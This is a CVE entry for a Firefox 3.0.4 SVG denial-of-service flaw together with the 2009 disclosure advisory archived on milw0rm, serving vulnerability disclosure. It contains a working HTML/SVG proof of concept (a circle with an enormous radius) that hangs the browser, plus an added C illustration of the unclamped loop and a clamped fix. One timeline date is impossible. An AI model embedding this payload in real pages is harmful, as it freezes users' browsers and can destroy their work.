The SVG component in Mozilla Firefox 3.0.4 allows remote attackers to cause a denial of service (application hang) via a large value in the r (aka Radius) attribute of a circle element, related to an "unclamped loop."
Category : Resource Management Errors. Weaknesses in this category are related to improper management of system resources.
Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 5 | | AV:N/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
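| Date | EPSS V0 | EPSS V1 | EPSS V2 (> 2022-02-04) | EPSS V3 (> 2025-03-07) | EPSS V4 (> 2025-03-17) |
|---|---|---|---|---|---|
| 2022-02-06 | – | – | 11% | – | – |
| 2022-04-03 | – | – | 11% | – | – |
| 2022-05-22 | – | – | 11% | – | – |
| 2023-03-12 | – | – | – | 6.75% | – |
| 2024-01-07 | – | – | – | 9.25% | – |
| 2024-03-03 | – | – | – | 9.25% | – |
| 2024-06-02 | – | – | – | 9.25% | – |
| 2025-01-19 | – | – | – | 9.25% | – |
| 2025-03-18 | – | – | – | – | 13.02% |
| 2025-03-30 | – | – | – | – | 13.02% |
| 2025-04-15 | – | – | – | – | 13.02% |
| 2025-04-15 | – | – | – | – | 13.02% |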
EPSS Percentile
The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.
From the low-hanging-fruit-department
Firefox et al. Denial of Service - All versions supporting SVG
________________________________________________________________________
CHEAP Plug :
************************************************************************
You are invited to participate in HACK.LU 2009, a small but concentrated
luxemburgish security conference. More information : http://www.hack.lu
CFP is open, sponsorship is still possible and warmly welcomed!
************************************************************************
Release mode: Forced release.
Ref : [TZO-26-2009] - Firefox DoS (unclamped loop) SVG
WWW : http://blog.zoller.lu/2009/04/advisory-firefox-dos-condition.html
Vendor : http://www.firefox.com
Status : No patch
CVE : none provided
Credit : none
Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=465615
Security notification reaction rating : There wasn't any reaction. OSS Security notification FTW
Notification to patch window : x+n
Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html
Affected products :
- Firefox all supporting SVG (didn't care to investigate which, task of the vendor)
- all software packages using mozilla engine and allowing SVG
I. Background
~~~~~~~~~~~~
Firefox is a popular internet browser.
II. Description
~~~~~~~~~~~~~~
This bug is a typical result of what we call an unclamped loop. An "attacker"
gives the r (radius) attribute of the circle element a very large value. That
is leetness.
Stack trace :
ntkrnlpa.exe+0x6e9ab
ntkrnlpa.exe!MmIsDriverVerifying+0xbb0
hal.dll+0x2ef2
xul.dll!NS_InvokeByIndex_P+0x30c36
xul.dll!NS_InvokeByIndex_P+0x30e8a
xul.dll!NS_InvokeByIndex_P+0x30e02
xul.dll!NS_InvokeByIndex_P+0x30f5e
xul.dll!XRE_InitEmbedding+0x7858
xul.dll!XRE_InitEmbedding+0xf4ee
xul.dll!XRE_TermEmbedding+0x11411
xul.dll!gfxTextRun::Draw+0xdd4d
xul.dll!gfxTextRun::Draw+0xe1ca
xul.dll!gfxWindowsPlatform::PrefChangedCallback+0x1495
xul.dll!gfxTextRun::SetSpaceGlyph+0x2678
xul.dll!gfxFont::NotifyLineBreaksChanged+0xf1d3
xul.dll!gfxWindowsPlatform::RunLoader+0xa9f6
xul.dll!NS_StringCopy_P+0x9942
xul.dll!gfxImageSurface::gfxImageSurface+0x3188
xul.dll!gfxImageSurface::gfxImageSurface+0x2ed8
Also produces exceptions in MOZCRT19...
MOZCRT19!modf+0x2570:
600715e0 660f122550450960 movlpd xmm4,qword ptr [MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] ds:0023:60094550=3fe62e42fefa39ef
III. Impact
~~~~~~~~~~
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any (hail to the web 2.0) might be lost.
IV. Proof of concept (hold your breath)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
</head>
<body>
<svg xmlns='http://www.w3.org/2000/svg'><circle cx='10' cy='10' r='1.79769313486231E+308' fill='red' /></svg>
</body></html>
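The "unclamped loop" named in section II, shown as an added C illustration (not Mozilla's or cairo's code, and not part of the original advisory). It assumes a hypothetical rasteriser that walks the circle's rows from cy - r to cy + r; the function names and the iteration budget are inventions of this example.

```c
#include <float.h>
#include <stdio.h>

/* Constructed sample: the r value used in the proof of concept above. */
static const double POC_RADIUS = 1.79769313486231E+308;

/* Unclamped: the loop range comes straight from the attribute. At this
 * magnitude y += 1.0 no longer changes y, so the loop never ends.
 * 'budget' exists only so the demo returns; -1 means "still spinning". */
long rows_unclamped(double cy, double r, long budget)
{
    long n = 0;
    for (double y = cy - r; y <= cy + r; y += 1.0)
        if (++n > budget)
            return -1;
    return n;
}

/* False for NaN and +/-infinity (every comparison with NaN is false). */
static int is_finite(double x) { return x >= -DBL_MAX && x <= DBL_MAX; }

/* Clamped: validate the inputs, then intersect the circle's vertical
 * extent with the drawing surface before any loop runs. */
long rows_clamped(double cy, double r, long surface_height)
{
    if (!is_finite(cy) || !is_finite(r) || r < 0.0 || surface_height <= 0)
        return 0;
    double top = cy - r, bottom = cy + r;
    double max_row = (double)(surface_height - 1);
    if (top < 0.0) top = 0.0;
    if (bottom > max_row) bottom = max_row;
    if (top > bottom)
        return 0;                      /* circle is entirely off-surface */
    long first = (long)top;
    if ((double)first < top) first++;  /* round up to the first whole row */
    long last = (long)bottom, n = 0;
    for (long y = first; y <= last; y++)
        n++;                           /* one bounded step per visible row */
    return n;
}

int main(void)
{
    printf("unclamped, r=5:   %ld\n", rows_unclamped(10.0, 5.0, 1000));
    printf("unclamped, PoC r: %ld\n", rows_unclamped(10.0, POC_RADIUS, 1000000));
    printf("clamped,   PoC r: %ld\n", rows_clamped(10.0, POC_RADIUS, 600));
    return 0;
}
```

The clamped variant does work proportional to the surface height, whatever radius the document supplies.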
V. Disclosure timeline
~~~~~~~~~~~~~~~~~~~~~~~~
DD/MM/YYYY
18/11/2008 : Created bugzilla entry (security) with proof of concept,
description, the terms under which I cooperate and the planned disclosure date.
24/22/2008 : Daniel Veditz comments : "Might be a cairo bug rather than SVG
(seems to be looping in libthebes), but I can definitely confirm
the DoS."
14/12/2008 : Ask for any action plan and my assessment of considering it low risk
No reply.
28/12/2008 : "Timeless" comments [..] personally, i intend to open this bug
to the public [..] a bug like this is more likely to be fixed
by being visible to more people than by leaving it in a closet.
26/05/2009 : In 2009 I agree; release of this advisory.
# milw0rm.com [2009-05-26]